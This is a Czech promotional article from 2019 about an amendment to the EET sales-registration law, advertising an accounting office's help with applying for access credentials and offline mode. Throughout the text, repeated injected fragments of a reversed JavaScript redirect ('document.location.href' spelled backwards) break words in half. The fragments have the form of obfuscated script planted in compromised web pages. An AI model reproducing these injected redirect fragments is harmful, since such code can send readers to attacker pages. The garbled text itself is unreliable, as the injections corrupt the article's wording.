Rainbow page separator

PR: EET pro všechny

Pátek, 20. září 2019

V minulých dnech jsme se dozvěděli, že Poslanecká sněmovna přehlasovala ve[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to Senátu a schválila tak novelu zákona o evidenci tržeb. Nyní se již jen čeká na podpis prezidenta a v okamžiku vydání ve Sbírce zákonů ČR bude definitivně jasno kdy, které změny nabudou účinnosti. Obecné očekávání je, že změny nabudou účinnosti v průběhu dubna nebo května 2020.

Zjednodušeně řečeno změny se budou týkat takřka všech podnikatelů, kteří přijímají ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovost.

Co bude třeba udělat, pokud se vás nově bude týkat EET? Musíte požádat o autentizační údaje, které slouží k přístupu na společné technické zařízení správce daně umožňující poplatníkovi správu certifikátu pro evidenci tržeb a údajů pro správu evidence tržeb. V případě, že nevíte jak, neváhejte kontak[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat Účetní kancelář Ing. Martin Nečas www.danenecas.cz, která za Vás žádost vyplní a poskytne nezbytnou součinnost při zavedení systému EET.

Lze se nějakým způsobem vyhnout EET? Kdo přijímá tržby ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovostní formou je musí až na specifické výjimky evidovat. Pro vybrané druhy podnikatelů, kteří splní určitá kritéria půjde tržby evidovat mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v EET v tzv. offline režimu. Pro zjištění, zda do [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to režimu patříte příp. podat žádost o evidenci v offline režimu Vám účetní kancelář Ing. Martin Nečas velmi ráda a ochotně pomůže.

O všech ostatních službách se dozvíte na tel. 731 564 865, příp. na webu www.danenecas.cz

Připravil: Účetní kancelář Ing. Martin Nečas